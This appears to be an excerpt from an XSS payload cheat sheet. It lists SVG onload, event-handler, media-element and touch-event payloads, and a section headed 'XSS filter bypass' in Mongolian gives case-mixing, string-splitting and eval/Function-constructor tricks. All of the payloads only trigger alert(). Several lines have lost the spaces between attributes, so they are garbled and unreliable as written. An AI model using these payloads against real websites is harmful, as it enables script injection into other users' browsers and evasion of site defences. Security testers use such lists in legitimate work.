<svgonload=alert(1)><svg/onload=alert('XSS')><svg onload=alert(1)//<svg/onload=alert(String.fromCharCode(88,83,83))><svg id=alert(1) onload=eval(id)>"><svg/onload=alert(String.fromCharCode(88,83,83))>"><svg/onload=alert(/XSS/)<svg><scripthref=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)<svg><script>alert('33')<svg><script>alert('33')
<bodyonload=alert(/XSS/.source)><input autofocusonfocus=alert(1)><select autofocusonfocus=alert(1)><textarea autofocusonfocus=alert(1)><keygen autofocusonfocus=alert(1)><video/poster/onerror=alert(1)><video><source onerror="javascript:alert(1)"><videosrc=_ onloadstart="alert(1)"><details/open/ontoggle="alert`1`"><audiosrconloadstart=alert(1)><marquee onstart=alert(1)><meter value=2 min=0 max=10 onmouseover=alert(1)>2 outof 10</meter><body ontouchstart=alert(1)> // Triggers when a finger touch the screen<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen<body ontouchmove=alert(1)>
XSS filter bypass аргууд
<sCrIpt>alert(1)</ScRipt><scriptx><scriptx>alert('XSS')<scripty>eval('ale'+'rt(0)');Function("ale"+"rt(1)")();new Function`al\ert\`6\``;setTimeout('ale'+'rt(2)');setInterval('ale'+'rt(10)');Set.constructor('ale'+'rt(13)')();Set.constructor`al\x65rt\x2814\x29```;<imgsrc='1'onerror='alert(0)' <String.fromCharCode(88,83,83)<a href=""onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a><script>window['alert'](document['domain'])</script>